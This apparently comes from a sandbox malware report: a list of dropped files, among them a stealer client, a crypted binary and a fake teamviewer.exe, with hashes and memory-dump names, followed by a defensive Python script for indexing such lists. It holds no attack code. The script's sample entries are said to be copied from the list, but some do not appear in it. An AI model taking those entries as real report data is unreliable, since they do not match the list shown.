memory/2604-115-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2604-117-0x0000000005110000-0x0000000005313000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe
| MD5 | 0516f1da5885fac0182377c29f30942a |
| SHA1 | 03a373a25636aa2502ef21b36e01ac88257ed845 |
| SHA256 | 8d0642f18b57a5af3a949eb9fe232790826ebddb2a820aa951f811f79dac9ff0 |
| SHA512 | eb38b9a2af0bd4604b8d806b7706342367ddde342ad69f6671a49506ba0e29b2d65564768f10ec506c73d2c6372a856d358e176d1af092158e3fbb930280dd7d |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
| MD5 | 70ea5dcc48050106d53dc725eb34c858 |
| SHA1 | 2115413890b23a3beffca441a6871a433aaa83c3 |
| SHA256 | 0cb6c649a9cb212b0e25528afece64e0e130d8c1b4a45cd677874472161793fc |
| SHA512 | 52142543759c5b9aeeeb4b99bdf71c82e7c937343697cc1e56b30c31de945cf765faef3c1074be2f59c691a7c0c30fff15a62dbfeb19dd20b9988f31a66cd703 |
memory/2664-141-0x0000000000500000-0x0000000000514000-memory.dmp
memory/2604-138-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2664-143-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/2604-144-0x0000000005110000-0x0000000005313000-memory.dmp
memory/2108-146-0x0000000004EB0000-0x0000000004EC0000-memory.dmp
memory/2664-148-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/2604-129-0x0000000005110000-0x0000000005313000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe
| MD5 | 5352330d462586bfea94ecb001ecef5e |
| SHA1 | 85a16c3d2f7dddc65a9ff7243e61b142fad9b497 |
| SHA256 | 8a049d96c7cb3586360c4936c28a543f8625ac00870a5887478eef8f2a169549 |
| SHA512 | 5de8fcf8da17d3da4e5d6693cb7bf9e1bc5a5f39d80380f83575b9e26ea7f5a99ebb5e33f5c2ad37e64daefedef144486ee01620090f10a12dd469a847820679 |
memory/2604-122-0x0000000005110000-0x0000000005313000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe
| MD5 | c93d84eaa210873046480553eed98194 |
| SHA1 | dd1a4cc2d68ace206400e793a26c93abfcac2e7c |
| SHA256 | 34cb66e01f04afb043efba23d4e742225cef84261ea2f33f22bc55c9f1a2fc1b |
| SHA512 | c9dbfeee9e5bd0e5103e6ff6af193dd148dc15d36a14bb11359566ae2ec941a6a73cd96e5e40c125e20371411ba847a137af5293aeed4cef8d668856f7daaa77 |
C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe
| MD5 | 4c3ee2f1e62106e961ec131ccf3e411e |
| SHA1 | 30b883d83528f75f449a02a969e8a72e81821964 |
| SHA256 | 2bb2bba4b38345c867ac21141344eef4666ec75bce655578f67a42d2b9d0de9e |
| SHA512 | 0bb24f6fe239c90efc9b54ef1a8b0f025e2e131644f0c51c7f309777f91fb39b890611b24b3cf5273916a9b9a4ceb7eb1ce95e504be8a9683779848a11b6bf5a |
C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe
| MD5 | 0c8b6953c0fb40261a0fe6b485df4c97 |
| SHA1 | 201fd884c868521480fc0914b474bf0a80ad3037 |
| SHA256 | 455aa7e1f2fe21cb3c2394bfa603193d9cbc1023e51cebc0be01398ae7f7c5ba |
| SHA512 | 55a2358c9dfa50e3cf01cd924a4fba30106dbc1946c27593b3407227fef92c6ecd9de36902b94818da5d791604c6eee1a28a7654e7b0e947a618c1bd2a2df58c |
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | 04055601abbd16ec6cc9e02450c19381 |
| SHA1 | 420bd7c7cad59f1b7cdd2c8a64282ef6f06cfe6e |
| SHA256 | b7620bff5539ff22c251c32e62961beae4f5a91b0f6c73dde1a7da941b93fe13 |
| SHA512 | 826c13cf6a37c561fb9052b3a0a7424df7d2fe424fe8c3783440c4483aa46a2cf1e4c275c7c080a130e178c7ac3221bb9224126ef4ab0bee38c24b12fa2a70ac |
memory/2604-1044-0x0000000005100000-0x0000000005110000-memory.dmp
memory/2604-1045-0x00000000050F0000-0x00000000050F1000-memory.dmp
memory/2604-1046-0x00000000054C0000-0x0000000005660000-memory.dmp
memory/2604-1047-0x0000000005660000-0x00000000056AC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
| MD5 | 71eb1bc6e6da380c1cb552d78b391b2a |
| SHA1 | df3278e6e26d8c0bc878fe0a8c8a91b28c5a652d |
| SHA256 | cefa92ee6cc2fad86c49dd37d57ff8afcb9b9abef0a110689e6d771394256bd6 |
| SHA512 | d6fab2c469924b8202f7964e864f66d6b6151937c8d134fb40e1f1d3787cf22328892c3f7209786e0b42e1abd5ca71a61f40538ef1e93534d2a98bf6d4448e90 |
C:\Users\Admin\AppData\Local\Temp\BBLb.exe
| MD5 | eea6a25a6b4a5757699a6ebf8238ac2d |
| SHA1 | 6d6344c08ffd145bdc6fda8f8d5e67ac09b038c8 |
| SHA256 | 97050216587f82f621a561fc2dbd48f43db5dfd22508f7246bbea016a0113c46 |
| SHA512 | af9d3e35a6ffc82fa8d22535cd9cae8d70d5804818ac05142074fb2455cfc82fe1d4130cc57e552867137d771868ae09994a5343d4e8b8aba1b93e88f3f58892 |
memory/3012-1059-0x0000000000CC0000-0x0000000000E00000-memory.dmp
memory/3012-1060-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/3012-1063-0x00000000055C0000-0x00000000056E8000-memory.dmp
memory/3012-1062-0x0000000002E90000-0x0000000002EA0000-memory.dmp
memory/2604-1069-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/3012-1068-0x0000000005760000-0x000000000588A000-memory.dmp
memory/2964-1072-0x0000000000400000-0x0000000000488000-memory.dmp
memory/2964-1270-0x00000000045A0000-0x00000000049A0000-memory.dmp
memory/2964-1274-0x00000000045A0000-0x00000000049A0000-memory.dmp
memory/2664-1286-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/4496-1289-0x00000000026E0000-0x0000000002AE0000-memory.dmp
memory/2964-1330-0x00000000045A0000-0x00000000049A0000-memory.dmp
memory/4496-1335-0x00000000026E0000-0x0000000002AE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe
| MD5 | af64e17a3ae14a0e6d5ebd6fd918d9a1 |
| SHA1 | 9bd02360d2725bf775dc0896dc6c9389bfc52ffe |
| SHA256 | ee7e31e83c3fd26752c404acca638c496a1cebae7120b72ff5386508663cab35 |
| SHA512 | 06efc2cff51a1e3e2b907b88a08f388a5701953d8bf52c8eef0dd3b1931a1d4044991204be89e83e72029b8b5f8b0589527524efe63260ca506c517bd5a6d51f |
C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe
| MD5 | b02f359dd0d7e67564d3eac6751d0ae1 |
| SHA1 | bbc70dfc988416f9748075cfa0f4643f5a7d213f |
| SHA256 | fdf25c5350179cdc132e7c860207e50f9bc4f7d9cf3380da9ead2878c3fa3f5a |
| SHA512 | b58de13bda68a6749ba8392dd8a1cdbe5ac40416330bf735c3c6d31caf6d2ed110ff69c065cc57bce35b03a093e8d6a4b9db6d68a8c5b83c4cd626ce385f9892 |
C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe
| MD5 | 50740dd10807d62d5d96b0748416238b |
| SHA1 | e6a5064d3edaf2302d915ae0c859d5565cd50815 |
| SHA256 | 14b2a086955affeca62fa9bc70cc600131c6cc2bddc366437659af345a1725c7 |
| SHA512 | 34ece24cf5e05f3dc41169634c9e6fffc523e3fadb07aea4c456c9c4d01b80910feeb67a1022dc4e5004a36177de08ce605b55c02c9f3b8adf0981746dd3e205 |
memory/4656-1848-0x0000000000920000-0x000000000174B000-memory.dmp
memory/4656-1853-0x00000000006D0000-0x00000000006D1000-memory.dmp
memory/3012-1865-0x00000000745E0000-0x0000000074D90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe
| MD5 | 09caa9400fc4a428bddcf6ce7083aa37 |
| SHA1 | 61d0f258b7fadccf69f2a6ac494977afe9f7f53e |
| SHA256 | 6e57013299b94fdd4915a06782732c3bb333a1e258b43df42d28788a207d6350 |
| SHA512 | 2bbb575935afdb474e5e79cdbe5bf9f22954f6c622246ec29445140ef7278156c91c4f909cad3f11326f09ac634e69510822232f1712849f3d855c5e89214d21 |
memory/4656-1872-0x0000000000860000-0x0000000000892000-memory.dmp
memory/4656-1867-0x0000000000860000-0x0000000000892000-memory.dmp
memory/4656-1882-0x0000000000860000-0x0000000000892000-memory.dmp
memory/4656-1878-0x0000000000860000-0x0000000000892000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe
| MD5 | 746c3d444c5122a42262caa23db27c77 |
| SHA1 | e65fabed400c7d7be22ab12d7a23e6e8d8df2a53 |
| SHA256 | 5c6490e730ae82a945aa46e866e1f42367dc640d5c4c91174135c8a09ea84110 |
| SHA512 | a195a984ce486468a5ad53cdb5388e2fff9c575cc566f83005bc64634f1d3f7dcf20020dde265d055b166223d93664d5ba590426016835d33a4a18f226820972 |
C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe
| MD5 | 0ea4d547a2813b43b6fa0480a3ebdecf |
| SHA1 | 2fa71cc33e7bdb4e8128a0e3a5813123e499bb13 |
| SHA256 | d4920aa53ff29cd24320d646afc8990294f5aa7bc99f0b8d76bcc9eb8d451c23 |
| SHA512 | c9ec25b05ed62b6bd4895c08b453ea32c57f0e458c7e528defa9a41c8e7486ee4b63aa612952924f21272fbbf543a053327a6577222e37cb06450addd6ad147d |
memory/4784-1885-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/4784-1889-0x0000000000C60000-0x0000000000F94000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe
| MD5 | 64d5a984c5d0fd74b729be5b52c00389 |
| SHA1 | 4c5478bd5fd7b58b9c89cbf375ef0005f6807e2f |
| SHA256 | daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7 |
| SHA512 | 87f290f55d3096ac48c82e192b49b9ff3eefa4f3c2ac6592d38e084e8bd8fc7bdc24169265d0cbce20ad6d0767aef521215b33a7cfa763fe73d3adf9184afcbf |
memory/4656-2002-0x0000000000920000-0x000000000174B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
| MD5 | 97256cf11c9109c24fde65395fef1306 |
| SHA1 | e60278d8383912f03f25e3f92bf558e2a33f229d |
| SHA256 | 21c23083404349dbc8e7094338acaa07ea5a7e3a442bb81a528e06c175b8d934 |
| SHA512 | 41e9c7911c1f461ec389ac9d430898bd9e21accf6b4291d30c4e743084bb19c2ae9279597f4a43cfaec621263cb135c3ada21e23e27cc7961c794fa499910c6e |
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
| MD5 | e11d69f19297ff2a428157e28014eb86 |
| SHA1 | 11f05de52c2f4b1f5191421d0837027fc277f811 |
| SHA256 | 74a3b7247a033e3bdde1a3238f814dfc4c481c369dcda3048ea9322f094d67c9 |
| SHA512 | c7fe48913d25c8fac624450bdfadc537dd5b6fefef855d3e96c6dbb12f097664ae56332b600dfc9073fd592200dfb2283dcb55a9a8516024985b9d1021d835ba |
memory/3012-2041-0x0000000002E90000-0x0000000002EA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1e2fsfjx.mdx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BBLb.exe.log
| MD5 | 4a911455784f74e368a4c2c7876d76f4 |
| SHA1 | a1700a0849ffb4f26671eb76da2489946b821c34 |
| SHA256 | 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c |
| SHA512 | 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d |
C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe
| MD5 | 00c80ad4ae1a04729dc7489cf59c21c0 |
| SHA1 | 62407168b615c1a02832bb345dbf2f8e9ddd22d5 |
| SHA256 | 79e9660d6472e6d4f74daf9282f6c95e1a8118292afb350af496fd3283956b47 |
| SHA512 | 41fd7737ff120de497fd9fdced525c075f5044abf7a8253f409414bb9b8c4095e36fa9101450e4f8666a396888ae42b54182f1d52938ce3d361a0bf4b2dd7bcf |
C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe
| MD5 | 0e4b35b9deee8ca581d37fe239d9a7d6 |
| SHA1 | d94d56b442efb3de9a46637d78b27fe7f3d84df7 |
| SHA256 | e29e9880a323bdb36154ab6a0618d9ea0d6ee4b120426e29f7f1e12be10def65 |
| SHA512 | bc12a0bd61ac26f9f08b6a122073112ef34a3de3cf03ab43d4e108d5ce4604261cba5d8287f1576781043f2db001add7387641412030992d4ad8b0d9b03265e0 |
C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe
| MD5 | a02521efa4d3e5529b226ad698a5a225 |
| SHA1 | a050e359c4fd1c565f31b81676248f9ca2d6d9a3 |
| SHA256 | b03371a4025c719394d2554d2541efe5354773cedf4999b27c1837b498fe3a4c |
| SHA512 | 6068bed3395c815e379147fe032ad760f85778d802cc94df35c55d0a2f2bfebdf1312569657fc8ee3283e580152dd4f50448fe77731744626a0f42d79b097e9a |
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
| MD5 | b45eeb95925aa16b9bb9112e4f57554b |
| SHA1 | fe02f56c3f7f58f8ea989423a2090d4c63fc45ca |
| SHA256 | c6e4da779c6f10a878f94aa66d650396f7147d6d08dc9c2a558e07487af6f8b1 |
| SHA512 | 08e70d895ecc26738dff944fd867aeb334a3b061308d9e430f3727df3a5848ac11b942258f351aa225d02521f047d3c43b26d8ad7984eccddb7962c6c2761435 |
C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
| MD5 | d453ef9c3dc299f89c28b750c191a137 |
| SHA1 | 065c0518fc1e38b617bbb233050a45999a3a7bc1 |
| SHA256 | 43f02a2d506f749b2afeb6a61823f806123f78e63c91e0eda8ea85b8c72b3696 |
| SHA512 | 4235718458a6f9debebb4d114e02f676a6f139a4ee018a21f64fdfa570fb605870b476f95c3362e402a0eb10abaddf934de6d22ba4688bc1bc4716134abc21c6 |
C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
| MD5 | 0d8be1bb1fc00596bd5bda33020208a8 |
| SHA1 | 904028f75d6d9a648f95f55114fc7760ebd77f80 |
| SHA256 | 89045fa36f27df01c8c3ab21b4b6860726710209c83a7212193613b36372e5e6 |
| SHA512 | 0272bad87f144eff2c3fdcfb84bc19d3d956b191b7be663733b99cdb82a22d1ede15637b2df634a0421cc80c92c02e56a3805d3cf42875e7ef06adf1cf4113af |
C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe
| MD5 | be1d8fb7825e9cd0f2572096d60bbd5f |
| SHA1 | ea39aa2ada986a28ea66f6252c7d597ffdfdbb96 |
| SHA256 | c0143c77d9bc39a7e6c58918f07a1309edc7d8d2148546e14b012e1a981a6bcd |
| SHA512 | 5563b88643ca05309b908251816a9028bb4eed224807c3c7d55c3041a3533d41d63fe958943696069457d621eb5cb97f520c4df3a377b637660724140cf3e38b |
C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe
| MD5 | b1e8d4d7dd26612c17eccbf66b280e7c |
| SHA1 | 97dd5e81a4014fb54ef5ac3f1db88519843c85c2 |
| SHA256 | e3940372b04a4cb2177ae409c195debccfe004600d73a39d429a577d248d4cb2 |
| SHA512 | ff70dd3103128cd36bd1da3a734e635ec76d53a5629fc1f05941d6cadb9e82310da0ea298dcf449ef17c42a70ea7d787a75585ffa37a74f9007ca91a4481ecc8 |
C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe
| MD5 | c3ee25c18f2c408c9054d9c6d4c1e147 |
| SHA1 | 80d2395709b713647b199c22fdec5415d3a68052 |
| SHA256 | c406b733897d091408ed5a656cfbf043623a8d08092269918184ccefd87971f0 |
| SHA512 | d91a1675ca9a2923020ce244d00da6a9b686240dc7ef50185709ecbc2f6b8f92c371ee94ec277a2d3b0e33704c532d2f8779b39ac9f630b9b40f0794312d72f4 |
C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe
| MD5 | b7284f4a9502d0d74e77d465f60f78f0 |
| SHA1 | 24a4fc7e6be9456e4428a4ec789c652a45db75dc |
| SHA256 | b58cdc2d1c18a58083eb52574470507f85e085d80f2c2df106c208ed2cd2641f |
| SHA512 | 979ed9d734ec6e6e2b49ddc93216226d8bcccbe5f4d2f53f047cafab176e5f34fb6d9744a159d134e9f25c74cf4642b6a5ffe87854275d7bea257ec6e04b3b7d |
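Several paths in this list (osminogs.exe, Amdau.exe, StealerClient_Cpp_1_3.exe, Update_new.exe and others) appear more than once with different hashes, and many memory dumps share the same address range across PIDs. The following is an added example, not part of the sandbox report, that indexes entries in this list's layout: it collects the distinct hashes per path so that paths rewritten with different content stand out, collapses repeated dump names, and groups dumps by PID and by address range. The sample entries are copied from the list; the reading that a range recurring at the same address in many processes is a shared DLL rather than a per-process payload is the editor's inference, resting on Windows assigning one ASLR base per DLL per boot.

```python
"""Index a sandbox dropped-file list: hashes per path, memory dumps per PID."""
import re
from collections import defaultdict

# Entries copied from the Files list (a representative subset). One memory
# dump line is repeated on purpose to show that repeats are collapsed.
SAMPLE_FILES = r"""
memory/1608-0-0x0000000000740000-0x0000000000748000-memory.dmp
memory/1608-1-0x00000000745E0000-0x0000000074D90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\app1.exe
| MD5 | 86443efb8ee2289340119b5e84aad4f1 |
| SHA1 | e8b2d4cc5fcebbfe798283431073e0b78ba80f4e |
| SHA256 | 4d64bbdbca232e9efbf8770386ed39562691793c678856d6e0c0fb1dc4af5219 |
C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe
| MD5 | af64e17a3ae14a0e6d5ebd6fd918d9a1 |
| SHA256 | ee7e31e83c3fd26752c404acca638c496a1cebae7120b72ff5386508663cab35 |
C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe
| MD5 | b02f359dd0d7e67564d3eac6751d0ae1 |
| SHA256 | fdf25c5350179cdc132e7c860207e50f9bc4f7d9cf3380da9ead2878c3fa3f5a |
memory/2964-1072-0x0000000000400000-0x0000000000488000-memory.dmp
memory/2108-35-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/1608-1-0x00000000745E0000-0x0000000074D90000-memory.dmp
"""

MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")


def parse_files(text):
    """Return (dropped, dumps). dropped: one dict per path line, in list order,
    carrying whatever hash rows followed it. dumps: unique (pid, index, start, end)."""
    dropped, dumps, seen = [], [], set()
    current = None
    for line in text.splitlines():
        line = line.strip()
        m = MEM_RE.match(line)
        if m:
            key = (int(m[1]), int(m[2]))
            if key not in seen:  # the same dump name may be listed twice
                seen.add(key)
                dumps.append(key + (int(m[3], 16), int(m[4], 16)))
            current = None
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current[m[1].lower()] = m[2].lower()
            continue
        if PATH_RE.match(line):
            current = {"path": line}
            dropped.append(current)
        else:
            current = None  # heading, blank line or anything unrecognised
    return dropped, dumps


def variants_by_path(dropped):
    """Distinct SHA256 values recorded for each path."""
    out = defaultdict(set)
    for d in dropped:
        if "sha256" in d:
            out[d["path"]].add(d["sha256"])
    return dict(out)


def repeatedly_rewritten(dropped):
    """Paths written more than once with different content. A hash captured on
    one run will not match the next; detection has to key on the path, the
    parent process or the behaviour instead."""
    return sorted(p for p, hs in variants_by_path(dropped).items() if len(hs) > 1)


def regions_by_pid(dumps):
    """(index, start, size) per PID, so each process's dumped ranges read at a glance."""
    out = defaultdict(list)
    for pid, idx, start, end in dumps:
        out[pid].append((idx, start, end - start))
    return dict(out)


def shared_regions(dumps):
    """Address ranges dumped from more than one PID. A range recurring at the
    same address across processes is a DLL at its per-boot ASLR base, not a
    payload unique to one process (inference, see lead-in)."""
    owners = defaultdict(set)
    for pid, _, start, end in dumps:
        owners[(start, end)].add(pid)
    return {rng: sorted(pids) for rng, pids in owners.items() if len(pids) > 1}


def all_hashes(dropped, algo="sha256"):
    """Flat, deduplicated hash list for a lookup feed."""
    return sorted({d[algo] for d in dropped if algo in d})


if __name__ == "__main__":
    dropped, dumps = parse_files(SAMPLE_FILES)
    print("rewritten with new content:", repeatedly_rewritten(dropped))
    for (start, end), pids in shared_regions(dumps).items():
        print(f"shared region {start:#x}-{end:#x} in PIDs {pids}")
    for pid, regs in regions_by_pid(dumps).items():
        print(pid, [(i, f"{s:#x}", f"{n:#x}") for i, s, n in regs])
    print(len(all_hashes(dropped)), "unique SHA256 values")
```

On the full list the rewritten-path check flags every payload the loader re-fetched, which is the practical lesson of this report: a hash set built from a single detonation is stale by the next one, so the durable indicators are the drop directory, the parent process, the scheduled task and the network endpoints, not the file hashes. Dumps that recur at one address in several PIDs can be set aside; the ones worth opening first are the per-process ranges, such as the 0x400000 image in PID 2964.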